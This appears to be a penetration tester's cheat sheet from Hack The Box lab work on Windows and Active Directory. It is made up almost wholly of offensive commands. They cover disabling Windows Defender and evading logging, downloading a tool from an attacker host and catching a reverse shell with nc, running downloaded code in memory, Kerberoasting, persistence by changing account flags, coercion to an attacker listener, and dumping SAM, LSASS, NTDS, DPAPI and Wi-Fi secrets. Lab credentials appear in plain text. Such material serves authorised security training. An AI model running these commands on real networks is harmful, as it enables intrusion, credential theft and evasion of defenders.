#Use Wireshark to captire either ARP or MDNS traffic (GUI)
Intrusionz3r0X@htb[/htb]$ sudo -E wireshark
#Use tcpdump to capture trafic
Intrusionz3r0X@htb[/htb]$ sudo tcpdump -i ens224 -w capture.pcap
#Read the capture.pcap and filter by IP
Intrusionz3r0X@htb[/htb]$ tshark -r capture.pcap -Y "arp" | grep -oP "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" | sort -u
#Analyze traffic by using responder (no poisoning)
Intrusionz3r0X@htb[/htb]$ sudo responder -I ens224 -A
#List shared Folder
C:\\htb> dir \\\\192.168.220.129\\Finance\\
PS C:\\htb> Get-ChildItem \\\\192.168.220.129\\Finance\\
#Search for a specific word in the filename.
C:\\htb>dir n:\\*cred* /s /b
C:\\htb>dir n:\\*secret* /s /b
PS C:\\htb> Get-ChildItem -Recurse -Path N:\\ -Include *cred* -File
Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name *cred*
#Search for a specific word within the content of the files.
c:\\htb> findstr /s /i cred n:\\*.*
PS C:\\htb> Get-ChildItem -Recurse -Path N:\\ | Select-String "cred" -List
Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred
Create SMB Share on Windows from Commandline
mkdir C:\temp
net share temp=C:\temp /grant:everyone,full
We can attempt to call Powershell version 2.0 or older. If successful, our actions from the shell will not be logged in Event Viewer. This is a great way for us to remain under the defenders' radar while still utilizing resources built into the hosts to our advantage.
#Checked if Defender was running
PS C:\\htb> netsh advfirewall show allprofiles
C:\\htb> sc query windefend
#Checking the Status of Windows Defender (RealTimeProtectionEnabled=True/False)
PS C:\\htb> Get-MpComputerStatus
# Disable real time monitoring in Windows Defender
PS C:\\> Set-MpPreference -DisableRealtimeMonitoring $true
#Checked if Defender was running
PS C:\\htb> netsh advfirewall show allprofiles
C:\\htb> sc query windefend
#Enumerate Applocker policies
PS C:\\htb> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
#Enumerating, enable and bypass Language Mode.
PS C:\\htb> $ExecutionContext.SessionState.LanguageMode
PS C:\\htb> Set-ExecutionPolicy unrestricted
PS C:\\htb> powershell.exe -noprofile -executionpolicy bypass -file .\\script.ps1
#Enumerating and read LAPS passwords
PS C:\\htb> Find-LAPSDelegatedGroups
PS C:\\htb> Find-AdmPwdExtendedRights
PS C:\\htb> Get-LAPSComputers
#Displays the status of the host's firewall. We can determine if it is active and filtering traffic.
netsh advfirewall show state
#check the status and configuration settings Windows Defender
PS C:\\htb> Get-MpComputerStatus
C:\\ProgramData>powershell -c wget 10.10.14.6/RunasCs.exe -outfile RunasCs.exe
C:\\ProgramData>.\\RunasCs.exe <username> <password> -r 10.10.14.6:443 cmd
Intrusionz3r@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 444
Connection received on 10.10.11.187 49906
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
Prints out adapter settings for the host. We can figure out the network segment from here.
route print
Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
netsh advfirewall show state
Displays the status of the host's firewall. We can determine if it is active and filtering traffic.
Windows Managment Instrumentation WMI
Command
Description
wmic qfe get Caption,Description,HotFixID,InstalledOn
Prints the patch level and description of the Hotfixes applied
wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
Displays basic host information to include any attributes within the list
wmic process list /format:list
A listing of all processes on host
wmic ntdomain list /format:list
Displays information about the Domain and Domain Controllers
wmic useraccount list /format:list
Displays information about all local accounts and any domain accounts that have logged into the device
wmic group list /format:list
Information about all local groups
wmic sysaccount list /format:list
Dumps information about any system accounts that are being used as service accounts.
Net Commands
Net Commands Trick
If you believe the network defenders are actively logging/looking for any commands out of the normal, you can try this workaround to using net commands. Typing net1 instead of net will execute the same functions without the potential trigger from the net string.
Command
Description
net accounts
Information about password requirements
net accounts /domain
Password and lockout policy
net group /domain
Information about domain groups
net group "Domain Admins" /domain
List users with domain admin privileges
net group "domain computers" /domain
List of PCs connected to the domain
net group "Domain Controllers" /domain
List PC accounts of domains controllers
net group <domain_group_name> /domain
User that belongs to the group
net groups /domain
List of domain groups
net localgroup
All available groups
net localgroup administrators /domain
List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup Administrators
Information about a group (admins)
net localgroup administrators [username] /add
Add user to administrators
net share
Check current shares
net user <ACCOUNT_NAME> /domain
Get information about a user within the domain
net user /domain
List all users of the domain
net user %username%
Information about the current user
net use x: \\computer\\share
Mount the share locally
net view
Get a list of computers
net view /all /domain[:domainname]
Shares on the domains
net view \\computer /ALL
List shares of a computer
net view /domain
List of PCs of the domain
PowerShell CMDLED
#Discover Modules
PS C:\\htb> Get-Module
#Load AD module
PS C:\\htb> Import-Module ActiveDirectory
#Get Domain Info
PS C:\\htb> Get-ADDomain
#Checking for trust relationships
PS C:\\htb> Get-ADTrust -Filter *
#Get-ADUser listing of accounts that may be susceptible to a Kerberoasting attack
PS C:\\htb> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
#Group enumeration,detailed information
PS C:\\htb> Get-ADGroup -Filter * | select name
PS C:\\htb> Get-ADGroup -Identity "Backup Operators"
#List the group members
PS C:\\htb> Get-ADGroupMember -Identity "Backup Operators"
#Testing for Local Admin Access with the current user
PS C:\\htb> Test-AdminAccess -ComputerName ACADEMY-EA-MS01
PS C:\\htb> Import-Module activedirectory
#Enumerate domain trust relationships (built-in powershell cmdlet)
PS C:\\htb> Get-ADTrust -Filter *
#Powerview Enumerate domain trust relationships
PS C:\\htb> Get-DomainTrust
# perform a domain trust mapping
PS C:\\htb> Get-DomainTrustMapping
#Checking Users in the Child Domain using Get-DomainUser
PS C:\\htb> Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
#numerate groups with users that do not belong to the domain, also known as foreign group membership
PS C:\\htb> Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
#Query trust relationships
C:\\htb> netdom query /domain:inlanefreight.local trust
# query domain controlores
C:\\htb> netdom query /domain:inlanefreight.local dc
# query workstations and servers
C:\\htb> netdom query /domain:inlanefreight.local workstation
Harnessing PowerShell
Cmd-Let
Description
Get-Module
Lists available modules loaded for use.
Get-ExecutionPolicy -List
Set-ExecutionPolicy Bypass -Scope Process
This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.
`Get-ChildItem Env:
ft Key,Value`
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
This is a quick and easy way to download a file from the web using PowerShell and call it from memory.
Micelaneous
#Convert a UTF-16LE to UTF-8 compatible with Linux
iconv -f UTF-16LE -t UTF-8 Applockerpolicy.txt -o Applockerpolicy2.txt
#Executing bloodhound On Linux
Intrusionz3r0X@htb[/htb]$ sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
Intrusionz3r0X@htb[/htb]$ zip -r ilfreight_bh.zip *.json
Intrusionz3r0X@htb[/htb]$ sudo neo4j start
Intrusionz3r0X@htb[/htb]$ bloodhound
#Execute bloodhound against a specific domain
Intrusionz3r0X@htb[/htb]$ bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2
sudo neo4j console
#Executin bloodhound On Windows
PS C:\\htb> .\\SharpHound.exe -c All --zipfilename ILFREIGHT
Type bloodhound into a CMD or PowerShell console
Adding INLANEFREIGHT.LOCAL Information to /etc/resolv.conf
Intrusionz3r0X@htb[/htb]$ cat /etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.
#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5
Powerview
Users
#Get info about a user
PS C:\\htb> Get-NetUser -UserName student107
#List All Users
PS Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount
#All disabled users
Get-NetUser -UACFilter ACCOUNTDISABLE
#Domain admins kerberostable
Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}
Groups
PS C:\\htb> Get-NetGroup #Get groups
PS C:\\htb> Get-NetGroup -Domain mydomain.local #Get groups of an specific domain
PS C:\\htb> Get-NetGroup 'Domain Admins' #Get all data of a group
PS C:\\htb> Get-NetGroup -UserName "myusername" #Get groups of a user
Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also
Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" group only exists in the rootdomain of the forest
Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts)
# Recursive Group Membership to know who to target for potential elevation of privileges.
PS C:\\htb> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Computers
Get-DomainComputer -Properties DnsHostName # Get all domain maes of computers
Get-NetComputer #Get all computer objects
Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation
Logon and Session
Get-NetSession -ComputerName <servername> #Get active sessions on the host
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
Retrived Domain SID
(Get-ADDomain)
Powerfull Powerview Commands
# Recursive Group Membership to know who to target for potential elevation of privileges.
PS C:\\htb> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
#ASREPRoastable users
PS C:\\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
#Kerberoastable users
PS C:\\htb> Get-NetUser -SPN | select samaccountname,userprincipalname,useraccountcontrol | fl
PS C:\\DotNetNuke\\Portals\\0> Get-DomainUser * -SPN -verbose | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\\ilfreight_spns.csv -NoTypeInformation
# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
# Users with this flag might have empty passwords (if allowed) or shorter passwords
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
#Persistence
#Asreproast
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Get-ADUser Jorden | Set-ADAccountControl -doesnotrequirepreauth $true
#Kerberosting
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
Get-ADUser -Filter 'Name -like "Jorden"' | Set-ADAccountControl -doesnotrequirepreauth $false
#Finding Passwords in the Description Field using Get-Domain User
Get-DomainUser * | Select-Object samaccountname, userprincipalname, useraccountcongtrol, description | Where-Object {$_.Description -ne $null} | fl
#All disabled users
Get-NetUser -UACFilter ACCOUNTDISABLE
#Retrieve *most* users who can perform DC replication for inlanefreight.local (i.e. DCsync)
Get-ObjectAcl "dc=dc=inlanefreight,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll'
Netexec
When you start your internal pentest, these are the first modules you should try:
If a vulnerability is found, you can set a LISTENER ip to coerce the connection.
#By default the LISTENER ip will be set to localhost, so no traffic will appear on the network.
Intrusionz3r0X@htb[/htb]$ nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP>
To run all exploit methods at once, add the ALWAYS=true option, otherwise it will stop if the underlying RPC connection reports a successful coercion.
#DUMP SAM (Admin or local admin privilege)
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --sam
#Dump LSA (Admin or local admin privilege)
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE' --lsa
#Dump LSASS (Admin or local admin privilege)
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.255.131 -u administrator -p pass -M lsassy
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.255.131 -u administrator -p pass -M nanodump
#DPAPI credentials get all secrets from Credential Manager, Chrome, Edge, Firefox.
$ nxc smb <ip> -u user -p password --dpapi
$ nxc smb <ip> -u user -p password --dpapi cookies
$ nxc smb <ip> -u user -p password --dpapi nosystem
$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem
# Dump the NTDS.dit from target DC (Admin or local admin privilege)
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --users --enabled
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vss
Intrusionz3r0X@htb[/htb]$ nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' -M ntdsutil
#Dump WIFI Passwords
Intrusionz3r0X@htb[/htb]$ nxc smb <ip> -u user -p pass -M wifi
Check email security
Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"
